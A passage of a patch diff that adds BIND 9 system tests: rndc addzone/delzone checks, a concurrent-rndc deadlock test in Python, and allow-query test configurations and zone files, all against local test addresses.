+ret=0 +cp -f ns3/redirect.db.2 ns3/redirect.db +$RNDCCMD 10.53.0.3 reload . > showzone.out.ns3.$n 2>&1 || ret=1 +_check_retransfering_secondary_redirect() ( + $RNDCCMD 10.53.0.2 retransfer -redirect > rndc.out.ns2.$n 2>&1 && + $RNDCCMD 10.53.0.2 zonestatus -redirect > zonestatus.out.ns2.$n 2>&1 && + grep "type: redirect" zonestatus.out.ns2.$n > /dev/null && + grep "serial: 1" zonestatus.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_retransfering_secondary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that deleting a 'secondary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone -redirect > rndc.out.ns2.$n 2>&1 || ret=1 +_check_deleting_secondary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 || true + grep 'not found' showzone.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_secondary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that zone type 'hint' is properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"." { type hint; file "hints.db"; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that zone type 'forward' is properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'forward.example { type forward; forwarders { 1.2.3.4; }; forward only; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that zone type 'delegation-only' is properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'delegation-only.example { type delegation-only; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'in-view' zones are properly rejected ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'in-view.example { in-view "_default"; };' > rndc.out.ns2.$n 2>&1 && ret=1 +grep "zones not supported by addzone" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "reconfiguring server with multiple views" +rm -f ns2/named.conf +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 + +echo_i "adding new zone to external view ($n)" +# NOTE: The internal view has "recursion yes" set, and so queries for +# nonexistent zones should return NOERROR. The external view is +# "recursion no", so queries for nonexistent zones should return +# REFUSED. This behavior should be the same regardless of whether +# the zone does not exist because a) it has not yet been loaded, b) +# it failed to load, or c) it has been deleted. +ret=0 +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.intpre.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.intpre.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.extpre.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.extpre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'added.example in external { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.ext.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if ! $FEATURETEST --with-lmdb; then + echo_i "checking new NZF file has comment ($n)" + ret=0 + hcount=`grep "^# New zone file for view: external" ns2/external.nzf | wc -l` + [ $hcount -eq 1 ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +if $FEATURETEST --with-lmdb; then + echo_i "verifying added.example in external view created an external.nzd DB ($n)" + ret=0 + [ -e ns2/external.nzd ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking rndc reload causes named to reload the external view's new zone config ($n)" +ret=0 +$RNDCCMD 10.53.0.2 reload 2>&1 | sed 's/^/ns2 /' | cat_i +_check_rndc_reload_external_view_config() ( + $DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n && + grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null && + $DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n && + grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null && + grep '^a.added.example' dig.out.ns2.ext.$n > /dev/null +) +retry_quiet 10 _check_rndc_reload_external_view_config || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with newly added zone ($n)" +_check_rndc_showzone_newly_added() ( + if ! $FEATURETEST --with-lmdb; then + expected='zone "added.example" in external { type primary; file "added.db"; };' + else + expected='zone "added.example" { type primary; file "added.db"; };' + fi + $RNDCCMD 10.53.0.2 showzone added.example in external > rndc.out.ns2.$n 2>/dev/null && + [ "`cat rndc.out.ns2.$n`" = "$expected" ] +) +retry_quiet 10 _check_rndc_showzone_newly_added || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'added.example in external' 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_newly_added_zone() ( + $DIG $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! grep '^a.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_newly_added_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add zone to internal view ($n)" +ret=0 +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.pre.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.pre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'added.example in internal { type primary; file "added.db"; };' 2> rndc.out.ns2.$n +grep "permission denied" rndc.out.ns2.$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.ext.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to delete a policy zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'policy in internal' 2> rndc.out.ns2.$n >&1 +grep 'cannot be deleted' rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding new zone again to external view ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'added.example in external { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +_check_adding_new_zone_again_external() ( + $DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n && + grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null && + $DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n && + grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null && + grep '^a.added.example' dig.out.ns2.ext.$n > /dev/null +) +retry_quiet 10 _check_adding_new_zone_again_external || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "reconfiguring server with multiple views and new-zones-directory" +rm -f ns2/named.conf +copy_setports ns2/named3.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 + +echo_i "checking new zone is still loaded after dir change ($n)" +ret=0 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.ext.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.ext.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone from external ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'added.example in external' 2>&1 | sed 's/^/I:ns2 /' +$DIG $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding new zone to directory view ($n)" +ret=0 +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.intpre.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.intpre.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.extpre.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.extpre.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.5 -b 10.53.0.5 a.added.example a > dig.out.ns2.dirpre.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.dirpre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'added.example in directory { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +$DIG +norec $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.added.example a > dig.out.ns2.int.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.int.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.4 -b 10.53.0.4 a.added.example a > dig.out.ns2.ext.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.ext.$n > /dev/null || ret=1 +$DIG +norec $DIGOPTS @10.53.0.5 -b 10.53.0.5 a.added.example a > dig.out.ns2.dir.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.dir.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.dir.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $FEATURETEST --with-lmdb; then + echo_i "checking NZD file was created in new-zones-directory ($n)" + expect=ns2/new-zones/directory.nzd +else + echo_i "checking NZF file was created in new-zones-directory ($n)" + expect=ns2/new-zones/directory.nzf +fi +$RNDCCMD 10.53.0.2 sync 'added.example IN directory' 2>&1 | sed 's/^/I:ns2 /' +sleep 2 +[ -e "$expect" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone from directory ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone 'added.example in directory' 2>&1 | sed 's/^/I:ns2 /' +$DIG $DIGOPTS @10.53.0.5 -b 10.53.0.5 a.added.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.added.example' dig.out.ns2.$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "ensure the configuration context is cleaned up correctly ($n)" +ret=0 +rndc_reconfig ns2 10.53.0.2 +$RNDCCMD 10.53.0.2 status > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check delzone after reconfig failure ($n)" +ret=0 +$RNDCCMD 10.53.0.3 addzone 'inlinesec.example. IN { type secondary; file "inlinesec.db"; masterfile-format text; primaries { test; }; };' > /dev/null 2>&1 || ret=1 +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 +$RNDCCMD 10.53.0.3 delzone inlinesec.example > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if ! $FEATURETEST --with-lmdb +then + echo_i "check that addzone is fully reversed on failure (--with-lmdb=no) ($n)" + ret=0 + $RNDCCMD 10.53.0.3 addzone "test1.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 + $RNDCCMD 10.53.0.3 addzone "test2.baz" '{ type primary; file "dne.db"; };' > /dev/null 2>&1 && ret=1 + $RNDCCMD 10.53.0.3 addzone "test3.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 + $RNDCCMD 10.53.0.3 delzone "test3.baz" > /dev/null 2>&1 || ret=1 + grep test2.baz ns3/_default.nzf > /dev/null && ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +_check_version_bind() ( + $DIG $DIGOPTS @10.53.0.3 version.bind txt ch > dig.out.test$n && + grep "status: NOERROR" dig.out.test$n > /dev/null +) + +echo_i "check that named restarts with multiple added zones ($n)" +ret=0 +$RNDCCMD 10.53.0.3 addzone "test4.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone "test5.baz" '{ type primary; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test/.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\".baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\\.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\032.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 addzone '"test\010.baz"' '{ type primary; check-names ignore; file "e.db"; };' > /dev/null 2>&1 || ret=1 +stop_server ns3 +start_server --noclean --restart --port ${PORT} ns3 || ret=1 +retry_quiet 10 _check_version_bind || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA "test4.baz" > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA "test5.baz" > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test/.baz' > dig.out.3.test$n || ret=1 +grep "status: NOERROR" dig.out.3.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.3.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test\\.baz' > dig.out.4.test$n || ret=1 +grep "status: NOERROR" dig.out.4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.4.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test\032.baz' > dig.out.5.test$n || ret=1 +grep "status: NOERROR" dig.out.5.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.5.test$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 SOA 'test\010.baz' > dig.out.6.test$n || ret=1 +grep "status: NOERROR" dig.out.6.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.6.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/addzone/tests_rndc_deadlock.py b/bin/tests/system/addzone/tests_rndc_deadlock.py new file mode 100755 index 0000000..7f4bf63 --- /dev/null +++ b/bin/tests/system/addzone/tests_rndc_deadlock.py @@ -0,0 +1,92 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import concurrent.futures +import os +import subprocess +import time + + +def run_rndc(server, rndc_command): + """ + Send the specified 'rndc_command' to 'server' with a timeout of 10 seconds + """ + rndc = os.getenv("RNDC") + port = os.getenv("CONTROLPORT") + + cmdline = [rndc, "-c", "../common/rndc.conf", "-p", port, "-s", server] + cmdline.extend(rndc_command) + + subprocess.check_output(cmdline, stderr=subprocess.STDOUT, timeout=10) + + +def rndc_loop(test_state, domain): + """ + Run "rndc addzone", "rndc modzone", and "rndc delzone" in a tight loop + until the test is considered finished, ignoring errors + """ + rndc_commands = [ + ["addzone", domain, '{ type master; file "example.db"; };'], + [ + "modzone", + domain, + '{ type master; file "example.db"; allow-transfer { any; }; };', + ], + ["delzone", domain], + ] + + while not test_state["finished"]: + for command in rndc_commands: + try: + run_rndc("10.53.0.3", command) + except subprocess.SubprocessError: + pass + + +def check_if_server_is_responsive(): + """ + Check if server status can be successfully retrieved using "rndc status" + """ + try: + run_rndc("10.53.0.3", ["status"]) + return True + except subprocess.SubprocessError: + return False + + +def test_rndc_deadlock(): + """ + Test whether running "rndc addzone", "rndc modzone", and "rndc delzone" + commands concurrently does not trigger a deadlock + """ + test_state = {"finished": False} + + # Create 4 worker threads running "rndc" commands in a loop. + with concurrent.futures.ThreadPoolExecutor() as executor: + for i in range(1, 5): + domain = "example%d" % i + executor.submit(rndc_loop, test_state, domain) + + # Run "rndc status" 10 times, with 1-second pauses between attempts. + # Each "rndc status" invocation has a timeout of 10 seconds. If any of + # them fails, the loop will be interrupted. + server_is_responsive = True + attempts = 10 + while server_is_responsive and attempts > 0: + server_is_responsive = check_if_server_is_responsive() + attempts -= 1 + time.sleep(1) + + # Signal worker threads that the test is finished. + test_state["finished"] = True + + # Check whether all "rndc status" commands succeeded. + assert server_is_responsive diff --git a/bin/tests/system/allow-query/clean.sh b/bin/tests/system/allow-query/clean.sh new file mode 100644 index 0000000..9914de7 --- /dev/null +++ b/bin/tests/system/allow-query/clean.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after allow query tests. +# + +rm -f dig.out.* +rm -f ns*/named.conf +rm -f ns2/controls.conf +rm -f */named.memstats +rm -f ns*/named.lock +rm -f ns*/named.run ns*/named.run.prev +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/allow-query/ns1/named.conf.in b/bin/tests/system/allow-query/ns1/named.conf.in new file mode 100644 index 0000000..a72cc87 --- /dev/null +++ b/bin/tests/system/allow-query/ns1/named.conf.in @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/allow-query/ns1/root.db b/bin/tests/system/allow-query/ns1/root.db new file mode 100644 index 0000000..456198e --- /dev/null +++ b/bin/tests/system/allow-query/ns1/root.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA a.root-servers.nil. hostmaster.localhost. 1 3600 1200 604800 3600 + NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +normal.example. NS ns2.normal.example. +ns2.normal.example. A 10.53.0.2 diff --git a/bin/tests/system/allow-query/ns2/generic.db b/bin/tests/system/allow-query/ns2/generic.db new file mode 100644 index 0000000..83e66f9 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/generic.db @@ -0,0 +1,33 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN @ +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.7.1 +mail A 10.0.7.2 +b A 10.0.7.3 +c A 10.0.7.4 +d A 10.0.7.5 +e A 10.0.7.6 +f A 10.0.7.7 +g A 10.0.7.8 +h A 10.0.7.9 diff --git a/bin/tests/system/allow-query/ns2/named01.conf.in b/bin/tests/system/allow-query/ns2/named01.conf.in new file mode 100644 index 0000000..1f7ab40 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named01.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named02.conf.in b/bin/tests/system/allow-query/ns2/named02.conf.in new file mode 100644 index 0000000..3e24bdc --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named02.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { any; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named03.conf.in b/bin/tests/system/allow-query/ns2/named03.conf.in new file mode 100644 index 0000000..dd5985b --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named03.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { none; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named04.conf.in b/bin/tests/system/allow-query/ns2/named04.conf.in new file mode 100644 index 0000000..f61447e --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named04.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { 10.53.0.2; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named05.conf.in b/bin/tests/system/allow-query/ns2/named05.conf.in new file mode 100644 index 0000000..53c31a3 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named05.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { 10.53.0.1; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named06.conf.in b/bin/tests/system/allow-query/ns2/named06.conf.in new file mode 100644 index 0000000..49d9e42 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named06.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query {! 10.53.0.2; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named07.conf.in b/bin/tests/system/allow-query/ns2/named07.conf.in new file mode 100644 index 0000000..a40cade --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named07.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.2; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { accept; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named08.conf.in b/bin/tests/system/allow-query/ns2/named08.conf.in new file mode 100644 index 0000000..413878b --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named08.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the 